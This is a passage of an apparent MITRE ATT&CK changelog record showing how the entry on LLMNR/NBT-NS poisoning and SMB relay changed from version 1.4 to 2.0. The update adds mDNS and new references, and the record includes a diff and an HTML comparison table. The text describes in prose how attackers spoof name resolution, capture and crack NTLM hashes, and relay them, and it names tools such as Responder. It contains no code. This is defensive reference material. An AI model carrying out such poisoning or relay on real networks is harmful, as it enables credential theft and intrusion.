\\n\\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\\n\\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\\n\\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\\u00a0\\n\\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)\", \"diff\": \"--- \\n+++ \\n@@ -1,9 +1,11 @@\\n-By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \\n+By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.(Citation: BlackCat ransomware) This activity may be used to collect or relay authentication materials. \\n \\n-Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\\n+Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.(Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\\n \\n-Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\\n+Multicast Domain Name System(mDNS) is a zero-configuration service used to resolve hostnames to IP addresses with \\u201c.local\\u201d as a top-level domain. MDNS is based upon Domain Name System (DNS) format and allows hosts on the same network segment to perform name resolution for other hosts, using multicast.(Citation: mDNS RFC)\\n \\n-In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\\u00a0\\n+Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137)/mDNS (UDP 5353) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\\n+\\n+In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various other protocols, such as LDAP, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\\u00a0\\n \\n Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)\"}, \"root['external_references'][6]['source_name']\": {\"new_value\": \"mDNS RFC\", \"old_value\": \"GitHub Conveigh\", \"new_path\": \"root['external_references'][7]['source_name']\"}, \"root['external_references'][6]['description']\": {\"new_value\": \"S. Cheshire, M. Krochmal. (2013, February). Multicast DNS. Retrieved February 2, 2026.\", \"old_value\": \"Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.\", \"new_path\": \"root['external_references'][7]['description']\"}, \"root['external_references'][6]['url']\": {\"new_value\": \"https://datatracker.ietf.org/doc/html/rfc6762\", \"old_value\": \"https://github.com/Kevin-Robertson/Conveigh\", \"new_path\": \"root['external_references'][7]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}, \"iterable_item_added\": {\"root['external_references'][4]\": {\"source_name\": \"BlackCat ransomware\", \"description\": \"Lucas Silva, Leandro Froes. (2022, April 18). An Investigation of the BlackCat Ransomware via Trend Micro Vision One. Retrieved February 2, 2026.\", \"url\": \"https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html\"}, \"root['x_mitre_contributors'][3]\": \"Arad Inbar\"}, \"iterable_item_removed\": {\"root['external_references'][8]\": {\"source_name\": \"Sternsecurity LLMNR-NBTNS\", \"description\": \"Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.\", \"url\": \"https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to38__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to38__0\"><a href=\"#difflib_chg_to38__top\">t</a></td><td class=\"diff_header\" id=\"from38_1\">1</td><td nowrap=\"nowrap\">By&nbsp;responding&nbsp;to&nbsp;LLMNR/NBT-NS&nbsp;network&nbsp;traffic,&nbsp;adversaries&nbsp;m</td><td class=\"diff_next\"><a href=\"#difflib_chg_to38__top\">t</a></td><td class=\"diff_header\" id=\"to38_1\">1</td><td nowrap=\"nowrap\">By&nbsp;responding&nbsp;to&nbsp;LLMNR/NBT-NS<span class=\"diff_add\">/mDNS</span>&nbsp;network&nbsp;traffic,&nbsp;adversar</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;spoof&nbsp;an&nbsp;authoritative&nbsp;source&nbsp;for&nbsp;name&nbsp;resolution&nbsp;to&nbsp;forc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ies&nbsp;may&nbsp;spoof&nbsp;an&nbsp;authoritative&nbsp;source&nbsp;for&nbsp;name&nbsp;resolution&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;communication&nbsp;with&nbsp;an&nbsp;adversary&nbsp;controlled&nbsp;system.&nbsp;This&nbsp;ac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;force&nbsp;communication&nbsp;with&nbsp;an&nbsp;adversary&nbsp;controlled&nbsp;system.<span class=\"diff_add\">(Ci</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tivity&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;collect&nbsp;or&nbsp;relay&nbsp;authentication&nbsp;materi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tation:&nbsp;BlackCat&nbsp;ransomware)</span>&nbsp;This&nbsp;activity&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;co</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">als.&nbsp;&nbsp;&nbsp;Link-Local&nbsp;Multicast&nbsp;Name&nbsp;Resolution&nbsp;(LLMNR)&nbsp;and&nbsp;NetB</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">llect&nbsp;or&nbsp;relay&nbsp;authentication&nbsp;materials.&nbsp;&nbsp;&nbsp;Link-Local&nbsp;Multic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">IOS&nbsp;Name&nbsp;Service&nbsp;(NBT-NS)&nbsp;are&nbsp;Microsoft&nbsp;Windows&nbsp;components&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ast&nbsp;Name&nbsp;Resolution&nbsp;(LLMNR)&nbsp;and&nbsp;NetBIOS&nbsp;Name&nbsp;Service&nbsp;(NBT-NS</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hat&nbsp;serve&nbsp;as&nbsp;alternate&nbsp;methods&nbsp;of&nbsp;host&nbsp;identification.&nbsp;LLMNR</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)&nbsp;are&nbsp;Microsoft&nbsp;Windows&nbsp;components&nbsp;that&nbsp;serve&nbsp;as&nbsp;alternate&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;is&nbsp;based&nbsp;upon&nbsp;the&nbsp;Domain&nbsp;Name&nbsp;System&nbsp;(DNS)&nbsp;format&nbsp;and&nbsp;allow</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ethods&nbsp;of&nbsp;host&nbsp;identification.&nbsp;LLMNR&nbsp;is&nbsp;based&nbsp;upon&nbsp;the&nbsp;Domai</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;hosts&nbsp;on&nbsp;the&nbsp;same&nbsp;local&nbsp;link&nbsp;to&nbsp;perform&nbsp;name&nbsp;resolution&nbsp;fo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;Name&nbsp;System&nbsp;(DNS)&nbsp;format&nbsp;and&nbsp;allows&nbsp;hosts&nbsp;on&nbsp;the&nbsp;same&nbsp;loca</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;other&nbsp;hosts.&nbsp;NBT-NS&nbsp;identifies&nbsp;systems&nbsp;on&nbsp;a&nbsp;local&nbsp;network&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;link&nbsp;to&nbsp;perform&nbsp;name&nbsp;resolution&nbsp;for&nbsp;other&nbsp;hosts.&nbsp;NBT-NS&nbsp;id</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">by&nbsp;their&nbsp;NetBIOS&nbsp;name.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Wikipedia&nbsp;LLMNR)(Citation:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">entifies&nbsp;systems&nbsp;on&nbsp;a&nbsp;local&nbsp;network&nbsp;by&nbsp;their&nbsp;NetBIOS&nbsp;name.(C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;TechNet&nbsp;NetBIOS)&nbsp;&nbsp;Adversaries&nbsp;can&nbsp;spoof&nbsp;an&nbsp;authoritative&nbsp;so</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation:&nbsp;Wikipedia&nbsp;LLMNR)(Citation:&nbsp;TechNet&nbsp;NetBIOS)&nbsp;&nbsp;<span class=\"diff_add\">Multic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">urce&nbsp;for&nbsp;name&nbsp;resolution&nbsp;on&nbsp;a&nbsp;victim&nbsp;network&nbsp;by&nbsp;responding&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ast&nbsp;Domain&nbsp;Name&nbsp;System(mDNS)&nbsp;is&nbsp;a&nbsp;zero-configuration&nbsp;service</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;LLMNR&nbsp;(UDP&nbsp;5355)/NBT-NS&nbsp;(UDP&nbsp;137)<span class=\"diff_chg\">&nbsp;traffic&nbsp;as&nbsp;if&nbsp;they</span>&nbsp;know&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;used&nbsp;to&nbsp;resolve&nbsp;hostnames&nbsp;to&nbsp;IP&nbsp;addresses&nbsp;with&nbsp;\u201c.local\u201d&nbsp;as&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;identity&nbsp;of&nbsp;the&nbsp;requested&nbsp;host,&nbsp;effectively&nbsp;poisoning&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a&nbsp;top-level&nbsp;domain.&nbsp;MDNS&nbsp;is&nbsp;based&nbsp;upon&nbsp;Domain&nbsp;Name&nbsp;System&nbsp;(D</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;service&nbsp;so&nbsp;that&nbsp;the&nbsp;victims&nbsp;will&nbsp;communicate&nbsp;with&nbsp;the&nbsp;adve</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">NS)&nbsp;format&nbsp;and&nbsp;allows&nbsp;hosts&nbsp;on&nbsp;the&nbsp;same&nbsp;network&nbsp;segment&nbsp;to&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsary&nbsp;controlled&nbsp;system.&nbsp;If&nbsp;the&nbsp;requested&nbsp;host&nbsp;belongs&nbsp;to&nbsp;a&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erform&nbsp;name&nbsp;resolution&nbsp;for&nbsp;other&nbsp;hosts,&nbsp;using&nbsp;multicast.(Cit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">resource&nbsp;that&nbsp;requires&nbsp;identification/authentication,&nbsp;the&nbsp;us</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation:&nbsp;mDNS&nbsp;RFC)&nbsp;&nbsp;</span>Adversaries&nbsp;can&nbsp;spoof&nbsp;an&nbsp;authoritative&nbsp;sou</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ername&nbsp;and&nbsp;NTLMv2&nbsp;hash&nbsp;will&nbsp;then&nbsp;be&nbsp;sent&nbsp;to&nbsp;the&nbsp;adversary&nbsp;co</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rce&nbsp;for&nbsp;name&nbsp;resolution&nbsp;on&nbsp;a&nbsp;victim&nbsp;network&nbsp;by&nbsp;responding&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntrolled&nbsp;system.&nbsp;The&nbsp;adversary&nbsp;can&nbsp;then&nbsp;collect&nbsp;the&nbsp;hash&nbsp;inf</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;LLMNR&nbsp;(UDP&nbsp;5355)/NBT-NS&nbsp;(UDP&nbsp;137)<span class=\"diff_chg\">/mDNS&nbsp;(UDP&nbsp;5353)&nbsp;traffic&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ormation&nbsp;sent&nbsp;over&nbsp;the&nbsp;wire&nbsp;through&nbsp;tools&nbsp;that&nbsp;monitor&nbsp;the&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">s&nbsp;if&nbsp;they</span>&nbsp;know&nbsp;the&nbsp;identity&nbsp;of&nbsp;the&nbsp;requested&nbsp;host,&nbsp;effective</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">orts&nbsp;for&nbsp;traffic&nbsp;or&nbsp;through&nbsp;[Network&nbsp;Sniffing](https://attac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ly&nbsp;poisoning&nbsp;the&nbsp;service&nbsp;so&nbsp;that&nbsp;the&nbsp;victims&nbsp;will&nbsp;communicat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/techniques/T1040)&nbsp;and&nbsp;crack&nbsp;the&nbsp;hashes&nbsp;offline&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;with&nbsp;the&nbsp;adversary&nbsp;controlled&nbsp;system.&nbsp;If&nbsp;the&nbsp;requested&nbsp;hos</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hrough&nbsp;[Brute&nbsp;Force](https://attack.mitre.org/techniques/T11</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;belongs&nbsp;to&nbsp;a&nbsp;resource&nbsp;that&nbsp;requires&nbsp;identification/authent</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">10)&nbsp;to&nbsp;obtain&nbsp;the&nbsp;plaintext&nbsp;passwords.&nbsp;&nbsp;In&nbsp;some&nbsp;cases&nbsp;where&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ication,&nbsp;the&nbsp;username&nbsp;and&nbsp;NTLMv2&nbsp;hash&nbsp;will&nbsp;then&nbsp;be&nbsp;sent&nbsp;to&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;adversary&nbsp;has&nbsp;access&nbsp;to&nbsp;a&nbsp;system&nbsp;that&nbsp;is&nbsp;in&nbsp;the&nbsp;authentic</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;adversary&nbsp;controlled&nbsp;system.&nbsp;The&nbsp;adversary&nbsp;can&nbsp;then&nbsp;colle</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;path&nbsp;between&nbsp;systems&nbsp;or&nbsp;when&nbsp;automated&nbsp;scans&nbsp;that&nbsp;use&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ct&nbsp;the&nbsp;hash&nbsp;information&nbsp;sent&nbsp;over&nbsp;the&nbsp;wire&nbsp;through&nbsp;tools&nbsp;tha</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">credentials&nbsp;attempt&nbsp;to&nbsp;authenticate&nbsp;to&nbsp;an&nbsp;adversary&nbsp;controll</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;monitor&nbsp;the&nbsp;ports&nbsp;for&nbsp;traffic&nbsp;or&nbsp;through&nbsp;[Network&nbsp;Sniffing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;system,&nbsp;the&nbsp;NTLMv1/v2&nbsp;hashes&nbsp;can&nbsp;be&nbsp;intercepted&nbsp;and&nbsp;relay</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">](https://attack.mitre.org/techniques/T1040)&nbsp;and&nbsp;crack&nbsp;the&nbsp;h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;to&nbsp;access&nbsp;and&nbsp;execute&nbsp;code&nbsp;against&nbsp;a&nbsp;target&nbsp;system.&nbsp;The&nbsp;r</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ashes&nbsp;offline&nbsp;through&nbsp;[Brute&nbsp;Force](https://attack.mitre.org</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">elay&nbsp;step&nbsp;can&nbsp;happen&nbsp;in&nbsp;conjunction&nbsp;with&nbsp;poisoning&nbsp;but&nbsp;may&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/techniques/T1110)&nbsp;to&nbsp;obtain&nbsp;the&nbsp;plaintext&nbsp;passwords.&nbsp;&nbsp;In&nbsp;so</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lso&nbsp;be&nbsp;independent&nbsp;of&nbsp;it.(Citation:&nbsp;byt3bl33d3r&nbsp;NTLM&nbsp;Relayin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">me&nbsp;cases&nbsp;where&nbsp;an&nbsp;adversary&nbsp;has&nbsp;access&nbsp;to&nbsp;a&nbsp;system&nbsp;that&nbsp;is&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g)(Citation:&nbsp;Secure&nbsp;Ideas&nbsp;SMB&nbsp;Relay)&nbsp;Additionally,&nbsp;adversari</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;the&nbsp;authentication&nbsp;path&nbsp;between&nbsp;systems&nbsp;or&nbsp;when&nbsp;automated&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;may&nbsp;encapsulate&nbsp;the&nbsp;NTLMv1/v2&nbsp;hashes&nbsp;into&nbsp;various&nbsp;protoco</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">scans&nbsp;that&nbsp;use&nbsp;credentials&nbsp;attempt&nbsp;to&nbsp;authenticate&nbsp;to&nbsp;an&nbsp;adv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ls,&nbsp;such&nbsp;as&nbsp;LDAP,&nbsp;<span class=\"diff_sub\">SMB,&nbsp;</span>MSSQL&nbsp;and&nbsp;HTTP,&nbsp;to&nbsp;expand&nbsp;and&nbsp;use&nbsp;mul</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersary&nbsp;controlled&nbsp;system,&nbsp;the&nbsp;NTLMv1/v2&nbsp;hashes&nbsp;can&nbsp;be&nbsp;interc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tiple&nbsp;services&nbsp;with&nbsp;the&nbsp;valid&nbsp;NTLM&nbsp;response.\u00a0&nbsp;&nbsp;Several&nbsp;tools</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">epted&nbsp;and&nbsp;relayed&nbsp;to&nbsp;access&nbsp;and&nbsp;execute&nbsp;code&nbsp;against&nbsp;a&nbsp;targe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;poison&nbsp;name&nbsp;services&nbsp;within&nbsp;local&nbsp;networks&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;system.&nbsp;The&nbsp;relay&nbsp;step&nbsp;can&nbsp;happen&nbsp;in&nbsp;conjunction&nbsp;with&nbsp;pois</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uch&nbsp;as&nbsp;NBNSpoof,&nbsp;Metasploit,&nbsp;and&nbsp;[Responder](https://attack.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oning&nbsp;but&nbsp;may&nbsp;also&nbsp;be&nbsp;independent&nbsp;of&nbsp;it.(Citation:&nbsp;byt3bl33d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mitre.org/software/S0174).(Citation:&nbsp;GitHub&nbsp;NBNSpoof)(Citati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">3r&nbsp;NTLM&nbsp;Relaying)(Citation:&nbsp;Secure&nbsp;Ideas&nbsp;SMB&nbsp;Relay)&nbsp;Addition</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;Rapid7&nbsp;LLMNR&nbsp;Spoofer)(Citation:&nbsp;GitHub&nbsp;Responder)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ally,&nbsp;adversaries&nbsp;may&nbsp;encapsulate&nbsp;the&nbsp;NTLMv1/v2&nbsp;hashes&nbsp;into&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">various<span class=\"diff_add\">&nbsp;other</span>&nbsp;protocols,&nbsp;such&nbsp;as&nbsp;LDAP,&nbsp;MSSQL&nbsp;and&nbsp;HTTP,&nbsp;to&nbsp;ex</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pand&nbsp;and&nbsp;use&nbsp;multiple&nbsp;services&nbsp;with&nbsp;the&nbsp;valid&nbsp;NTLM&nbsp;response.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">\u00a0&nbsp;&nbsp;Several&nbsp;tools&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;poison&nbsp;name&nbsp;services&nbsp;within&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">local&nbsp;networks&nbsp;such&nbsp;as&nbsp;NBNSpoof,&nbsp;Metasploit,&nbsp;and&nbsp;[Responder]</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/software/S0174).(Citation:&nbsp;GitHub&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">NBNSpoof)(Citation:&nbsp;Rapid7&nbsp;LLMNR&nbsp;Spoofer)(Citation:&nbsp;GitHub&nbsp;R</td></tr>\n            <tr><td 